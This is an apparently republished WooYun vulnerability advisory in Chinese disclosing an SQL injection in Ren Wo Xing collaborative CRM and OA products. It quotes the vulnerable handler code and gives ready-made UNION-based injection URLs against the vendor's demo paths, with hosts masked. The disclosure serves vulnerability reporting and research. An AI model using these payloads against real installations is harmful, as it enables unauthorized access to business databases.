任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

2015年7月31日06:15:19评论487 views字数 262阅读0分52秒阅读模式

摘要

2014-11-05：细节已通知厂商并且等待厂商处理中
2014-11-07：厂商已经确认，细节仅向厂商公开
2014-11-10：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-01-01：细节向核心白帽子及相关领域专家公开
2015-01-11：细节向普通白帽子公开
2015-01-21：细节向实习白帽子公开
2015-02-01：细节向公众公开

漏洞概要关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-81809

漏洞标题：任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

漏洞作者： wefgod

提交时间： 2014-11-05 13:20

公开时间： 2015-02-01 13:22

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： .net代码审计

4人收藏

漏洞详情

披露状态：

简要描述：

官网几个demo全部复现。

详细说明：

官网：

http://**.**.**.**/

成都任我行信息技术有限公司

存在问题的系统是：

任我行协同CRM、任我行协同OA、任我行协同CRM 精华版

客户案例：

http://**.**.**.**/static/consumer/

漏洞证明：

漏洞文件：

Handlers/WorkFlowDesignHandler.ashx

code 区域

case "getformsbyids":
                 {
                     WorkFlowManageDAL workFlowManageDAL = new WorkFlowManageDAL();
                     string text2 = context.Request["formIds"];  //参数可控
                     System.Data.DataTable dataTable = workFlowManageDAL.SelectFormListByIds(text2); //跟进去看
                     s = WFDesigner.GetFormsByIdsToXML(dataTable);
                     break;
                 }

跟进SelectFormListByIds

code 区域

public DataTable SelectFormListByIds(string ids)
 {
     DataTable result;
     try
     {
         string commandText = "select ID,Name from CRM_CustomHtml where ID in(" + ids.ReplaceSqlInjectChar() + ")";  //此处仅过滤了单引号，可以轻松注入成功（因为完全可以不用单引号）
         result = this.DbInstance.ExecuteDataSet(CommandType.Text, commandText).Tables[0];
     }
 
 ……………………
 
 }

直接看官方的几个demo吧：

任我行协同CRM：

http://**.**.**.**/xt/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

任我行协同CRM精华版：

http://**.**.**.**/jhb/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

任我行协同OA：

http://**.**.**.**/oa/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2)--

http://**.**.**.**/oa/Handlers/WorkFlowDesignHandler.ashx?action=getformsbyids&formIds=2) UNION ALL SELECT NULL,@@version--

解密密码：

修复方案：

过滤

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-11-07 14:42

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-03 14:37 | Joker ( 实习白帽子 | Rank:44 漏洞数:6 | while(age++) { rmb += make(); try { ...)

0

小心向左使来砍你。

1# 回复此人
2014-11-03 14:47 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

0

小心任盈盈来砍你。

2# 回复此人
2014-11-03 16:03 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

0

@鬼魅羊羔 @Joker 哈哈你们二位配合的真好，我来破坏队形

3# 回复此人
2015-02-01 21:32 | 大物期末不能挂 ( 普通白帽子 | Rank:176 漏洞数:29 | 1.一个学渣，只求每门都不挂 2.想把漏洞提...)

0

( 支付乌云币6个可以永久查看测试代码区域,wb归曾主所有确定支付并查看 )

4# 回复此人
2015-02-01 21:33 | 大物期末不能挂 ( 普通白帽子 | Rank:176 漏洞数:29 | 1.一个学渣，只求每门都不挂 2.想把漏洞提...)

0

错别字。。。我错了，是层不是曾

5# 回复此人

漏洞概要 关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-81809

漏洞标题： 任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

相关厂商： 成都任我行信息技术有限公司

漏洞作者： wefgod

提交时间： 2014-11-05 13:20

公开时间： 2015-02-01 13:22

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： .net代码审计

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wefgod@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(19) 关注此漏洞

漏洞标题：任我行协同CRM、任我行协同OA、任我行协同CRM 精华版存在通用型SQL注入

相关厂商：成都任我行信息技术有限公司

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞评价(共0人评价):

登陆后才能进行评分